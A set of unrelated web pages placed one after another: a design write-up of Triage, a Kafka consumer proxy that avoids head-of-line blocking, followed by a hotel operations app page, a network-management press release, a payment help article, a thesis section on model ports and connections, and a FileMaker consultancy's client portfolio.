to customers. The consumer application expects to receive a message that contains an integer for the product_id field, but instead, it receives a message with no value for that field. With no mechanism to deal with this poison pill, processing halts. This will stop all orders behind the message in question even though they could be processed without problems. Non-Uniform Consumer Latency Slow messages can cause non-uniform consumer latency, where a consumer takes an unusually long time to process a message. For instance, suppose a consumer application makes a call to one of many external services based on the contents of a message. If one of these external services is sluggish, a message's processing time will be unusually slow. Messages in the queue that don’t rely on the delayed external service will also experience an increase in processing latency. HoLB Due to Non-Uniform Consumer Latency To illustrate how non-uniform consumer latency causes HoLB, imagine a consumer application that is subscribed to the greenAndOrangeMessages topic. It receives the messages and routes them to one of two external services based on their color. - If the message is green, it is sent to the green external service, called Green Service. - If the message is orange, it is sent to the orange external service, called Orange Service. As the consumer is pulling messages, there’s a sudden spike in latency in the response from Orange Service. When the consumer calls Orange Service while processing the orange message, the lack of response blocks the processing of all messages behind it. Although all the messages behind the orange message are green, they cannot be processed by the consumer, even though Green Service is functioning normally. Here, non-uniform consumer latency slows down the entire partition and causes HoLB. The consequences of HoLB in a message queue can range from disruptive, such as slow performance, to fatal - potential crashes. An obvious solution to these issues might be simply dropping messages; however, in many cases, data loss is unacceptable. For our use case, an ideal solution would retain all messages. Based on the problem space described, we determined the following requirements for a solution: - It should be publicly available to consumer application developers. - It should serve developers working in a polyglot microservices environment. - It should prevent data loss (messages should never be dropped). - It should integrate smoothly into existing architectures. - It should be easily deployed regardless of the user’s cloud environment (if any). With the aforementioned requirements in mind, we extensively researched existing solutions and approaches to solving HoLB. The solutions we found ranged from built-in Kafka configurations to service models built to support large Kafka deployments. By default, the Kafka consumer library sends commits back to Kafka every 5 seconds, regardless of whether a message has been successfully processed. Where data loss is not an issue, auto-commit is a reasonable solution to HoLB. If a problematic message is encountered, the application can simply drop the message and move on. However, where data loss is unacceptable, this approach will not work. Confluent Parallel Consumer Confluent Parallel Consumer (CPC) is a Java Kafka Consumer library that seemingly addresses HoLB by offering an increase in parallelism beyond partition count for a given topic . It operates by processing messages in parallel using multiple threads on the consumer application’s host machine. While CPC is an attractive solution, there were a few areas where it differed from our design requirements. The most obvious shortcoming for us was the fact that it's written in Java. In modern polyglot microservice environments, this presents a notable con - any developer wanting to utilize the advantages of CPC would need to rewrite their applications in Java. Additionally, our requirements did not permit data loss; while setting up data loss prevention with CPC is feasible, we sought a solution that came with this functionality out of the box. Kafka Workers (DoorDash) DoorDash chose to leverage Kafka to help them achieve their goals of rapid throughput and low latency. Unfortunately, their use of Kafka introduced HoLB caused by non-uniform consumer latency. The worker-based solution that Doordash implemented to address this problem consists of a single Kafka consumer instance per partition, called a "worker," which pipes messages into a local queue . Processes called task-executors, within the "worker" instance, then retrieve the events from this queue and process them. This solution allows events on a single partition to be processed by multiple task-executors in parallel. If a single message is slow to process, it doesn’t impact the processing time of other messages. Other available task-executors can read off the local queue and process messages even though a message at the head might be slow. While this solution solves HoLB caused by non-uniform consumer latency, it did not fit our design requirements due to its lack of data loss prevention. According to DoorDash, if a worker crashes, messages within its local queue may be lost. As previously established, data loss prevention was a strict design requirement for us, making this approach a poor fit for our use case. Consumer Proxy Model (Uber) Uber sought to solve HoLB caused by non-uniform consumer latency and poison pills while ensuring at-least-once delivery since they deemed data loss intolerable. Their solution, Consumer Proxy, solves HoLB by acting as a proxy between the Kafka cluster and multiple instances of the consumer application . With this approach, messages are ingested and then processed in parallel by consumer instances. Consumer Proxy also uses a system of internal acknowledgments sent by consumer instances, indicating the successful processing of a message. Consumer Proxy only commits messages back to Kafka which have been successfully processed. If a message cannot be processed, a dead-letter queue is used to store it for later retrieval. Uber’s Consumer Proxy is a feature-rich solution that seems to fulfill all of our requirements. It eliminated HoLB due to the two causes our team was concerned with while avoiding data loss. That being said, Consumer Proxy is an in-house solution that is not publicly available for consumer application developers. Based on our research, none of the solutions fit all of our requirements – they either were not supported in multiple languages, failed to solve HoLB for both causes identified, or were not publicly available. We chose Uber's consumer proxy model as the basis for Triage because it solved both causes of HoLB and was language agnostic. As seen in the figure above, a Triage instance acts as a Kafka consumer proxy and passes messages to downstream consumer instances. How Does Triage Work? Triage will subscribe to a topic on the Kafka cluster and begin consuming messages. When a message is consumed, it is sent to an instance of a consumer application. This consumer instance will process the message and send back a status code that reflects whether or not a message has been successfully processed. Triage uses an internal system of acks and nacks (acknowledgments and negative acknowledgments) to identify healthy versus poison pill messages. Internally, Triage uses a Commit Tracker to determine which messages have been successfully acknowledged and can be committed back to Kafka. Once it has done so, those records are deleted from the tracker. For messages that have been negatively acknowledged, Triage utilizes the dead-letter pattern to avoid data loss. Triage Solves HoLB Caused By Poison Pills When a poison pill is encountered, the consumer instance will send back a nack for that message. A nack directs Triage to deliver the message record in its entirety to a DynamoDB table. Here, it can be accessed at any point in the future for further analysis or work. The partition will not be blocked, and messages can continue to be consumed uninterrupted. Triage Solves HoLB Caused by Non-Uniform Consumer Latency With Triage, if a consumer instance takes an unusually long time to process a message, the partition remains unblocked. Messages can continue to be processed using other available consumer instances. Once the consumer instance finishes processing the slow message, it can continue processing messages. How Can I Use Triage? Triage can be deployed using our triage-cli command line tool, available as an NPM package. It offers a 2 step process that deploys Triage to AWS. You can read our step-by-step instructions here: Triage CLI. Connecting to Triage Consumer applications can connect to Triage using our thin client library, currently offered in Go. It handles authenticating with and connecting to Triage and provides an easy-to-use interface for developers to indicate whether a message has been processed successfully. Triage Design Challenges Based on our requirements for Triage, we encountered a few challenges. Below, we’ll present our reasoning behind the solutions we chose and how they allowed us to fulfill all of our solution requirements. We knew we wanted Triage to be language-agnostic – a consumer application should be able to connect to Triage, regardless of the language it’s written in. To do this, we had to consider whether Triage would exist as a service between Kafka and the consumer or as a client library on the consumer itself. We also needed to decide on a suitable network protocol. By leveraging a service + thin client library implementation and gRPC code generation, we can build out support for consumer applications written in any language with relative ease. Service vs. Client Library On one hand, a client library offers simplicity of implementation and testing, as well as the advantage of not having to add any new pieces of infrastructure to a user’s system. We could also expect to get buy-in from developers with less pushback, as testing a client library with an existing system is more manageable than integrating a new service. There were, however, some disadvantages with this approach. Our solution to addressing non-uniform consumer latency relies on parallel processing of a single partition. While, in theory, a client library could support multiple instances of a consumer application, a service implementation is more straightforward. Even if a client library were to be designed to dispatch messages to multiple consumer instances, it would begin to resemble a service implementation. Another concern of ours was ease of maintainability. Within modern polyglot microservice environments, maintenance of client libraries written in multiple languages consumes a non-trivial amount of engineering hours. Changes in the Kafka version and the dependencies of the client libraries themselves could cause breaking changes that require time to resolve. We assumed that those hours could be better spent on core application logic. Kafka can be difficult to work with. While the core concepts of Kafka are relatively straightforward to understand, in practice, interaction with a Kafka cluster involves a steep learning curve. There are over 40 configuration settings that a Kafka client can specify, making setting up an optimal or even functional consumer application difficult. Uber, for example, noted that their internal Kafka team was spending about half of their working hours troubleshooting for consumer application developers . By centralizing the core functionality of Triage to a service running in the cloud and only utilizing a thin client library for connecting to Triage, support and maintenance become easier. Triage’s client library is simple – it makes an initial HTTP connection request with an authentication key provided by the developer and runs a gRPC server that listens for incoming messages. Implementing support in additional languages for this thin client library is straightforward, and much of the challenge around configuring a Kafka consumer is abstracted away from the developer. The next decision that we faced was choosing an appropriate network protocol for communication with consumer applications. HTTP was an obvious consideration both for its ubiquity and ease of implementation; however, after further research, we felt gRPC was the better option . gRPC allows us to leverage the benefits of HTTP/2 over HTTP/1.1, specifically regarding the size of traffic we send and receive. HTTP/2 uses protocol buffers which are serialized and emitted as binaries to achieve higher compression than HTTP/1.1, which typically uses the de-facto standard of JSON. Higher compression means less data to send over the network and ultimately, faster throughput. A counterpoint to the compression argument is the existence and growing popularity of JSON with gzip. Compression gains from protocol buffers compared to JSON with gzip are less impressive; however, we run into similar dependency pains mentioned in our discussion of service versus client library implementations. Each version of the thin client library we would potentially write must import its own language’s implementation of gzip. gRPC also makes it easy to build out support for multiple languages via out of the box code generation. Using the same gRPC files we’ve used for Triage's Go client library, we can utilize a simple command-line tool to generate gRPC server and client implementations in all major programming languages. Enabling Parallel Consumption Since Triage operates by dispatching messages to several consumer instances, we needed a way to send messages to, and receive responses from, them simultaneously. We knew that the language we chose would play a significant role in solving this challenge. By creating dedicated Goroutines for each consumer instance and synchronizing them with the rest of Triage via channels, we enable parallel consumption of a single Kafka partition. We chose Go for the relative simplicity of implementing concurrency via Goroutines and the ease of synchronization and passing data across these Goroutines via channels. Goroutines can be thought of as non-blocking function loops that can run concurrently with other functions . The resource overhead of creating and running a Goroutine is negligible, so it’s not uncommon to see programs with thousands of Goroutines. This sort of multithreaded behavior is easy to use with Go, as a generic function can be turned into a Goroutine by simply prepending its invocation with the keyword go. Each major component of Triage exists as a Goroutine, which often relies on other underlying Goroutines. Channels are used extensively to pass data between these components and achieve synchronization where needed. In the figure below, myFunc()'s execution will block execution of the print statement "I'm after myFunc!" Conversely, the invocation of myFunc() below is prepended with the go keyword. It will now execute in the background, as a Goroutine, allowing the execution of the print statement. Channels in Go are queue-like data structures that facilitate communication across processes within a Go application. Channels support passing both primitives and structs. We can think of a function that writes a given value to a channel as a “sender” and a function that reads said value off of the channel as a “receiver.” When a sender attempts to write a message but there is no receiver attempting to pull a message off of the channel, code execution is blocked until a receiver is ready. Similarly, if a receiver attempts to read a message off of the channel when there is no sender, code execution is blocked until a sender writes a message. Ease of Deployment We wanted to make sure that deploying Triage was as simple as possible for consumer application developers. Our goal was for setup, deployment, and teardown to be painless. By taking advantage of the AWS Cloud Development Kit (CDK) in conjunction with AWS Fargate on Elastic Container Service (ECS), we were able to create an automated deployment script that interacts with our command line tool, triage-cli. This allows users to deploy a failure-resistant Fargate service to AWS in just a few easy steps. AWS Fargate on ECS We chose AWS for its wide geographic distribution, general industry familiarity, and support for containerized deployments. AWS offers services in virtually every region of the world, meaning that developers looking to use Triage can deploy anywhere. We selected Fargate as the deployment strategy for Triage containers, removing the overhead of provisioning and managing individual virtual private server instances. Instead, we could concern ourselves with relatively simple ECS task and service definitions. In our case, we define a task as a single container running Triage. Our service definition is a collection of these tasks, with the number of tasks being equal to the number of partitions for a given topic. This service definition is vital to how we guard against failure - if a Triage container were to crash, it would be scrapped and another would immediately be provisioned automatically. Using Fargate doesn’t mean that we sacrifice any of the benefits that come with ECS since Fargate exists on top of ECS. Health checks and logs, as well as all of the infrastructure created during the deployment, are available to and owned by a user, since Triage deploys using the AWS account logged into the AWS CLI. Automated deployment is enabled by CDK. Manually deploying Triage would require an understanding of cloud-based networking that would increase technical overhead. Amazon’s CDK abstracts that away – instead of having to set up the dozens of individual entities that must be provisioned and interconnected for a working cloud deployment, we were able to use ready-made templates provided by CDK for a straightforward deployment script. We created triage-cli to interact with the deployment script created with AWS CDK. This allows us to interpolate user-specific configuration details into the script and deploy using just two commands – triage init and triage deploy. Having found solutions to our design challenges, our next step in developing Triage was implementation. In this section, we will discuss the components that make up the application logic of a Triage container, as well as provide a brief overview of how our thin client library interacts with it. We will address implementation with the following subsections: - Message Flow - How Triage pulls messages from Kafka and sends them to consumers - Consumer Instances - How a consumer instance receives messages from Triage and responds - Handling Acks/Nacks - How Triage handles these responses - Commits - How Triage handles commits We will start by describing the flow of messages from Kafka, through Triage, to downstream consumer instances. The Fetcher component is an instance of a Kafka consumer – it periodically polls Kafka for messages. It then writes these messages to the Commit Tracker component and sends them to the messages channel. We will discuss the Commit Tracker in a later section - for now, it is sufficient to know that a copy of a message ingested by Triage is stored in a hashmap, and a reference to this message is sent over the messages channel. At this point in the flow, messages from Kafka are sitting in the messages channel and are ready to be processed. The Consumer Manager component runs a simple HTTP server that listens for incoming requests from consumer instances. After authenticating a request, the Consumer Manager parses the consumer instance’s network address and writes it to the newConsumers channel. To recap, we now have messages from Kafka in a messages channel and network addresses to send them to in a newConsumers channel. Triage’s Dispatch component is responsible for getting messages from within Triage to the consumer instances. We can think of Dispatch as a looping function that waits for network addresses on the newConsumers channel. When it receives a network address, it uses it to instantiate a gRPC client – think of this as a simple agent to make network calls. When this client is created, a connection is established between the client and the consumer at the network address. Dispatch then calls a function called senderRoutine, passing it the gRPC client as a parameter. senderRoutine is invoked as a Goroutine, ensuring that when Dispatch loops and listens for the next network address, senderRoutine continues to run in the background. senderRoutine is essentially a for loop. First, a message is pulled off of the messages channel. The gRPC client passed to senderRoutine is then used to send this message over the network to the consumer instance. The senderRoutine now waits for a response. We will now discuss how consumer instances receive messages from, and send responses to, Triage. Consumer applications interact with Triage using the Triage Client. This client library is responsible for the following: - Providing a convenience method to send an HTTP request to Triage - Accepting a message handler - Running a gRPC Server We have already covered the HTTP request – we will now examine message handlers and gRPC servers. Developers first pass the client library a message handler function – the message handler should have a Kafka message as a parameter, process the message, and return either a positive or negative integer based on the outcome of the processing. This integer is how consumer application developers can indicate whether a message has or has not been successfully processed. When the consumer application is started, it runs a gRPC server that listens on a dedicated port. When the server receives a message from Triage, it invokes the message handler, with the message as an argument. If the message handler returns a positive integer, it indicates that the message was successfully processed, and an ack is sent back to Triage. If the handler returns a negative integer, it indicates that the message was not processed successfully, and a nack is sent to Triage. So far, we have covered how messages get from Kafka, through Triage, and to consumer instances. We then explained how Triage’s client library manages receiving these messages and sending responses. We will now cover how Triage handles these responses. As discussed in the message flow section, after sending a message to a consumer instance, senderRoutine waits for a response. When a response is received, senderRoutine creates an acknowledgment struct. The struct has two fields - Status and Message. The Status field indicates either a positive or negative acknowledgment. If the response was a nack, a reference to the message is saved under the Message field of the struct. For acked messages, the Message field can be nil. Finally, before looping to send another message, senderRoutine places the struct on the acknowledgments channel. A component called Filter listens on the acknowledgments channel. It pulls acknowledgment structs off the channel and performs one of two actions based on whether the struct represents an ack or a nack. For acks, Filter immediately updates the Commit Tracker’s hashmap. We will discuss the Commit Tracker’s hashmap in the next section - for now, it is enough to know that an ack means we can mark the entry representing the message in the hashmap as acknowledged. For nacks, however, the hashmap cannot be updated immediately - we have a bad message and need to ensure it is stored somewhere before moving on. Filter places this negative acknowledgment in the deadLetters channel. A component called Reaper listens on this deadLetters channel. It makes an API call to DynamoDB, attempting to write the faulty message to a table. Once confirmation is received from DynamoDB that the write was successful, the entry representing the message in Commit Tracker’s hashmap can be marked as acknowledged. At this point, we have covered how messages get from Kafka, through Triage, to consumer instances. We have also covered how consumer instances process these messages, send responses back to Triage, and how Triage handles these responses. We will now cover the Commit Tracker component and how it allows us to manage commits back to Kafka effectively. As discussed in the message flow section, as messages are ingested by Triage, we store a reference to them in a hashmap. The hashmap’s keys are the offsets of the messages, and the values are a custom struct called CommitStore. The CommitStore struct has two fields - Message and Value . The Message field stores a reference to a specific Kafka message; the Value field stores whether or not Triage has received a response for this message. Previously, we mentioned that the Filter and Reaper components marked messages in the hashmap as acknowledged. More specifically, they were updating the Value field. Because messages that are nacked are stored in DynamoDB for processing at a later time, we can think of them as “processed,” at least with respect to calculating which offset to commit back to Kafka. To calculate which offset to commit, a component called CommitCalculator periodically runs in the background. To be efficient with our commits, we want to commit the highest offset possible since Kafka will implicitly commit all messages below our committed offset. For example, if there are 100 messages in a partition and we commit offset 50, Kafka will consider offsets 0-49 as “committed.” Extending this example, let us assume that these 100 messages are currently stored in the hashmap. If we have received acknowledgments for offsets 0 through 48 – and offset 50 – but have not yet received an acknowledgment for offset 49, we cannot commit offset 50 since that would imply that 49 has been successfully processed. Instead, we can only commit offset 48 and have to wait for the acknowledgment for 49 before committing 50. In other words, Commit Tracker commits the greatest offset for which all previous messages have also been acknowledged. Once this offset is determined, Triage sends a commit back to the Kafka cluster and awaits confirmation that the commit was successful. Finally, all entries up to and including the offset of the message just committed are removed from Commit Tracker’s hashmap. Having covered commits, we have arrived at the end of a message’s life cycle within a system using Triage. Below are the improvements we would like to implement in the future. Language Support for the Triage Client Library Cause of Failure Field Giving developers the ability to add a reason for failed messages would help them identify and analyze errors. Developers could supply a custom field on the nack sent to Triage. We would store this field with the message record in the DynamoDB table. Notifications for Poison Pills We believe developers could benefit from notifications when poison pills are written to DynamoDB. Having these notifications integrated with a platform like Slack could serve as an alarm to respond rapidly. We think this is a relatively easy feature to implement and is likely our next step.
systems_science
https://experience-crm.fr/en/partenaires/1check-app-hotel-operations/
2023-12-10T04:28:26
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679101195.85/warc/CC-MAIN-20231210025335-20231210055335-00649.warc.gz
0.895638
977
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__251058309
en
1Check was conceptualized in 2011 by Virginie LAFON as part of the Best Craftsmen in France competition, where she emerged as the winner in the Hotel Services Governess class. With the participation of Pierre LAFON, an expert in new mobile technologies, a prototype was developed and implemented in the Radisson Blu hotel as a beta version. The purpose of this solution is to digitally transform work procedures related to cleanliness, maintenance, and quality control, aiming to improve communication between three main services: reception, housekeeping, and maintenance. Quickly adopted by other accommodation-related sectors facing similar challenges, 1Check is also used in outdoor hospitality, tourist residences, theme parks, cruises, rentals, health, and facility management. 1Check is designed for teams working in interaction throughout the day. Communication and action tracking are immediate and seamless. As a mobile application, information exchange occurs in real-time among all collaborators, enhancing responsiveness and productivity by reducing movements within the establishment. Connected bidirectionally to PMS (Property Management System), the 1Check solution automatically retrieves real-time room statuses and facilitates direct mobile terminal status changes. This enables direct communication with reception teams, real-time room status visibility, and better informing clients about room availability. In this manner, 1Check also collects reservations, providing access to various predictive modules that facilitate operational management (linen management, schedule management, etc.). 1Check offers a SAAS (Software as a Service) solution, adapting to business-specific needs. It is an ergonomic, easy-to-deploy solution that equips all staff through a mobile application and an online-accessible software. Products & Services 1Check oversees the following aspects: Cleanliness and Quality Management: - Track the progress of room services. - Know the estimated time of room availability. - Have a real-time view of the rooms. - Send client requests to various concerned services. - Communicate instantly with staff through a messaging system. - Automate openings with dynamic credit/work time management. - Real-time monitoring and management of room services on different floors. - Manage team instructions and tasks as well as client requests. - Control rooms and public areas. - Report incidents of all types, including maintenance issues with comments and photos. - Record and manage found items on the go. - Real-time room updates to reception through PMS interface. - Receive and manage real-time maintenance requests from chambermaids, governesses, receptionists, or directly from clients using our MAX service. - Schedule corrective maintenance actions with external service provider management. - Plan and manage preventive maintenance actions on the go with checklists. - Oversee all maintenance through tracking indicators and be automatically alerted to abnormal recurrence of a problem in a room or public area. Reporting and Statistics: - Track KPIs and key indicators of one or multiple establishments directly from the 1Check software. - Quality control monitoring at all client contact points in the establishment. - Visibility into the detailed budget of annual investments. Additionally, for outdoor hospitality: - Manage departure schedules. - Manage automated cleaning schedules with area management. - Know the real-time availability of accommodation units after cleaning. - Send service requests to relevant teams. - Send technical incidents to the maintenance department. - Manage found items. - Receive and manage all real-time technical intervention requests. - Manage winterization entries and exits. - Conduct regulatory surveys such as water chemistry in pool areas on the go. - Have maintenance tracking for each chassis number. - Report incidents to the maintenance department from mobile homes. - Inspect mobile homes before customer arrival. - Communicate via messaging with all campsite staff. - The multilingual assistant accessible via a QR code in the room allows your clients to interact with operational teams from their room without going through the reception. - The QR code provides access to a customer web app where they will find your “room directory” (menus, activities, etc.) as well as the “client request” module through which they can make housekeeping or maintenance requests without contact. - Requests go directly to the concerned teams in real-time. Information is not lost, and the client is satisfied more quickly for optimal service quality. Additionally, your client can be informed of the progress of their request via SMS. Languages: French, English Region: France, French-speaking countries, UK, English-speaking countries Software suitable for: Hotels, Hotel-Restaurants, Hotel Groups, Hotel Residences, Campgrounds, Outdoor Hospitality, etc
systems_science
https://megasys.com/telenium-spectra-to-be-deployed-at-dairyland-power-cooperative/
2022-06-24T21:48:17
s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103033816.0/warc/CC-MAIN-20220624213908-20220625003908-00202.warc.gz
0.883843
284
CC-MAIN-2022-27
webtext-fineweb__CC-MAIN-2022-27__0__104690567
en
TELENIUM SPECTRA TO BE DEPLOYED AT DAIRYLAND POWER COOPERATIVE Calgary, AB – May 27, 2015 Dairyland Power Cooperative recently accepted MegaSys’ proposal of Telenium Spectra to monitor Dairyland’s microwave radio communications system and extended networks across its 45,000 square mile service area. The Telenium solution is expected to be in full production by July 1, 2015. With headquarters in La Crosse, Wis., Dairyland provides wholesale electricity to 25 member distribution cooperatives and 17 municipal utilities in Wisconsin, Minnesota, Iowa and Illinois. Please visit www.dairynet.com. MegaSys Computer Technologies is a major supplier of advanced Network Management Systems for the telecommunications market based on its flagship product Telenium. MegaSys has developed the most powerful and flexible network management system available, designed on an intelligent, high performance, object oriented database that provides unsurpassed processing, network management and database growth. Earning a reputation as a world-class performer in network management, MegaSys has delivered Telenium solutions across North America, Asia-Pacific and Europe. MegaSys customers include wireless and broadband carriers, CLECs, IXCs, cable companies, private utilities and state agencies, ranging in size from small regional networks to large national networks. Additional information is available at www.megasys.com.
systems_science
https://therabill.zendesk.com/hc/en-us/articles/217248203-Spinning-Circle-Processing-Credit-Card-Transactions
2019-10-14T03:44:37
s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986649035.4/warc/CC-MAIN-20191014025508-20191014052508-00020.warc.gz
0.916582
264
CC-MAIN-2019-43
webtext-fineweb__CC-MAIN-2019-43__0__119912295
en
Normally, processing a credit card takes a matter of seconds. In instances where the processor is taking a long time to respond, a spinning circle window will appear. To understand what is happening, let's review what happens when you process a credit card. The Credit Card Process - The system bundles the information that you provided and sends it to the credit card processor. - The processor determines whether to approve or deny the transactions. - A response is sent to the system and the results are displayed. Continuous Spinning Circle There are a few reasons why the circle can spin for an extended period of time: - The credit card processor is taking longer than normal to respond. Be patient and give the processor up to 2 minutes to send a response. - You lost internet connection. If you lost internet connection, then the application no longer has contact with your computer and can't remove the spinning circle. If the spinning circle continues to show, you can close the gateway using the red X in the top-right corner. It the system eventually receives a response, an entry will appear on the Credit Card Transactions report. However, the lack of an entry does not indicate the transaction was not processed. You will want to log into your virtual terminal to verify the status of the transaction.
systems_science
http://msdl.cs.mcgill.ca/people/tfeng/thesis/node31.html
2018-09-22T20:57:00
s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267158691.56/warc/CC-MAIN-20180922201637-20180922222037-00463.warc.gz
0.939862
600
CC-MAIN-2018-39
webtext-fineweb__CC-MAIN-2018-39__0__160996999
en
Ports and connections provide a means for a model to communicate with other concurrently and independently running models. This is different from importation, where a model is imported into an importation state of another model, and the combined model runs sequentially as a whole. Connections are the communication channels between those concurrent models. After they are established, messages can be sent and received via those channels. Except when two connected models communicate, they are independent, and they have no other means to affect the behavior of each other. A message is a tuple where is the message name. The names of different messages may be the same. Actually, there is no way to guarantee uniqueness, since every model runs independently and concurrently. There is no restriction on , except that it should not contain a dot ``.'' is a set of parameters. Each parameter is a variable. To establish a connection, a server model with at least one port must be started first. The link set of the server may be empty, since it usually does not connect to other models at start-up time. A client must also have at least one port. When it starts running, the simulation/execution environment connects it to the server(s) according to the set defined in it. That is, for each link defined in , connect port of the client model with port of the server model(s) . All the connections are established at start-up time. If any of the connections cannot be established, the client model cannot be simulated or executed. Its simulator or executor should immediately terminate, without even placing the client model in its default state(s). If any of the following situations occurs, the establishment of connection is considered a failure: Once connections between two models are established, they are never disconnected. A port of a client may connect to multiple ports of one or more servers. Reversely, a port of a server may be connected by multiple ports of one or more clients. Messages can be sent in any part of a model where action code can be written, such as the output of a transition, and and of a state. To send a message, a model simply broadcasts an event whose name starts with the port name and a following dot ``.'' On the one hand, since neither the port name nor the message name can have a dot in it, the only dot in this representation separates the two parts. On the other hand, no transition handles an event sent internally with a name that contains a dot, the simulator or executor knows that it is an out-going message instead of a normal event. Before the message is sent via a connection, the port name and the dot are removed. When the simulator or executor of the receiver receives this message, it first adds the name of its input port to the message name (again separated with a dot), and then broadcasts the event internally. The parameters of the message are regarded as the parameters of the event.
systems_science
https://www.coredbs.com/
2024-04-20T16:15:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817670.11/warc/CC-MAIN-20240420153103-20240420183103-00709.warc.gz
0.950455
2,346
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__85521041
en
We design and build Filemaker database systems — both large and small — to meet specific client needs. Our solutions are compatible with standard and popular desktop, tablet and mobile devices. We work with you on design. Then we build attractive and efficient websites which interact with your Filemaker databases. We use Filemaker Server's REST API to build data bridges and synchronization tools to help keep your data clean and consistent across systems. We develop your data systems using cloud computing for system stability and device-independent interface. This construction makes your systems readily accessible to all your staff members. We migrate data from outdated and constrained databases. We spend time upfront working with you to understand your unique data situation, and we solicit your feedback throughout. We build online payment processing tools leveraging Authorize.net and PayPal services. Filemaker Pro, MySQL EC2 Hosting, SES Mail, S3 Storage, CloudFront, Glacier HTML, CSS, PHP, JQuery, Bootstrap, Ajax, JSON Filemaker Go, Filemaker WebDirect, Bootstrap "CORESYSTEMS KNOWS SCHOOLS AND THEIR NEEDS. They understand us, from Admissions through grades and comments. I can't imagine working with anyone else." Doug Fodeman, Director of Technology, Brookwood School "CORESystems has revolutionized the way our school operates. Teachers, administrators and staff have all benefited from the care and personal attention that has gone into our customized system." Tom Gromak, Database Administrator, Watkinson School We built a database and website which integrates with the school's FinalSite website. Parents of returning students enroll their child(ren) for the upcoming academic year. Features include multiple contracts, individualized financial assistance amounts, payment processing. "When I was told we needed to have an online re-enrollment process I did not hesitate to ask CORESystems to develop it. We asked for online student contracts that leveraged FinalSite authentication and submitted to our Filemaker Pro database system. The system had to dynamically reflect contract status and collect e-check payments. In addition, it had to account for various family relations and multiple versions of contracts. As a long-time client, it was no surprise that the product Core delivered was able to provide accurate contracts, seamless delivery, and an attractive and intuitive user experience for our parents." — Katherine Schulze, Director of Technology We built an automated tool which migrates data from a Work Force Admissions module to a Tableau reporting tool. "I have been a CORESystems client since 2001. They are, without a doubt, one of the service providers that I value most highly. Their solutions are elegant, intuitive, easy to maintain, and their time to market is faster than any other vendor I have worked with. CORESystems deliverables perform as expected and meet specifications every time. On more than one occasion, when my other service providers are flummoxed, CORESystems has saved the day with innovative approaches to problems that have left others unsure how to proceed. When faced with a challenging data integration task that no one on the team has attempted before, CORESystems is my go-to as well. They are 100% reliable and I know that if I need assistance urgently, they will do everything possible to answer critical questions or resolve problems promptly. CORESystems is not merely a service provider to me, they are a value-added partner." — Dirk DeLo, Chief Technology Officer We built a custom, Filemaker web and reporting module to allow parents to register for conferences online. "The scheduling of parent-teacher conferences has long been a problem for us. Balancing the unique nature of our different academic devisions, the parent's schedules, fairness and efficiently has been a challenge no "off the shelf" systems to has been able to meet. Core Systems developed for us a completely customized and flexible parent-teacher conference scheduling system that allows parents to self register from a computer or smart phone in a completely fair and simple way. It provides them with automated reminders and us with useful reports. We could not have asked for anything more. " — Adam Gerson, Director of Technology We built a comprehensive all-school system which united data in Admissions, Current Students, Development and Summer Offices, and which includes an Online Application and a Parents Portal. "For the last seven years, Branson’s advancement team has utilized CORESystems to build what is now a multi-layered database that tracks gifts, pledges and donor information seamlessly. The CORE development team created several reporting features, which include our ‘favorite’, a two-year annual giving report that was incredibly time-consuming and challenging! They are always incredibly responsive, especially during crunch times should any items need modification. Last year, databases for our admission and academic departments, as well as our summer school program were streamlined; our campus systems are now one. We are beyond grateful for their time and talent that has helped our school function so efficiently and our advancement team look good!" — Susan Brennan, Director of the Annual Fund We built a School Directory module which incorporates Blackbaud data. "We have been having challenges every year with our printed school directory. The CORE Systems crew created an automated system using our database information to generate our directory. Going into this project, we were resigned that an automatic system would not be able to give use everything we wanted. Wrong. They were able to accommodate all the little details in our directory that we have grown accustomed to throughout the years. Literally with the push of a button, a directory is generated that is emailed to our printer. Thank you CORESystems for providing us with a mechanism to use our time more efficiently while producing a quality publication." — Jim Bonfiglio, Director of Operations We designed a report cards database built with Filemaker to store Blackbaud data which is refreshed periodically through an ODBC connection. The database also stores students, courses, and teachers attributes. We built a website with a series of user-specific pages for database access by teacher, administrators and parents. Teachers can efficiently enter their reports. Proofreaders have the ability to search for, edit and annotate individual reports. Proofreader notes are automatically emailed to teachers for quick and streamlined communication. The system emails parents with custom links when report cards are published. Parents may view a current report card or reports across the years. "This system has made our report card dreams come true. It was completely customized for our specific needs and workflow. Its integration with Blackbaud means no more manually importing csv files to keep data in sync. CORESystems expertise, personal attention and support is unmatched!" — Adam Gerson, Director of Technology We built a database which extractrs data from Raiser's Edge, Whipple Hill, and a Filemaker system, and which performs comparisons of data and automatically delivers discrepancy reports each evening. "The module, designed and implemented by CORESystems, was a huge breakthrough for us that we had needed for many years. The new system coordinates the ability to have a data-dump from multiple sources and merge them into one database - from which we can compare fields based on stored mappings. It also performs a nightly refresh of data and emails a report about it. The automatic nightly report is functionality the school did not have before and it is invaluable in trying to keep two non-talking databases in sync." — Katherine Schulze, Director of Technology We built a database and website to manage a complicated after-school program enrollment system. The database makes use of data from existing Filemaker system which ensured the integrity of the historical data and made the project more cost-effective for the school. The office staff has a direct interface to the new system for generating rosters, recording attendance, generating billing lists, communicating with instructors and communicating with the parent community. Parents use the website to enroll their children in after-school program and after-care offerings on both a consistent and drop-in basis. "The new system allows us to keep our flexible care offerings to parents, while not exhausting staff resources in updating lists and records. The office can quickly download accurate lists and records that are easy to share with the parent community. The new system is linked to our admissions' database allowing me ready access to student/family information. It is so valuable that the database is built to grow with our programming. The new system is absolutely amazing and there is no going back. The ongoing support is superb." — Nicole Lehrer, Director of Auxiliary Programming We built a Filemaker file to draw data from an existing all-school database — Teachers use a neat Tool feature to select Students, Behavior Types, and to enter note for Advisors and parents, who are notified by email. It also includes totals reports by grade, advisor, team color, etc. "CORESystems helped us develop a system that handles our very complex rotating block schedule, two campuses, 3-4 bus systems and different grade reports for almost every grade. They listened to our needs and the solution they created has been a godsend. Where before we had a home grown FileMaker database that over the years was cobbled together to deal with code of conduct infractions and rewards, we now have a streamlined system with an elegant user interface and which requires little or not maintenance." — Michael Beesley, Director of Technology We built a collection of three Filemaker files which are refreshed nightly via ODBC and contain an Enroller Tool for managing class rosters, a teacher interface with highly customized, class-specific layouts, and tools for 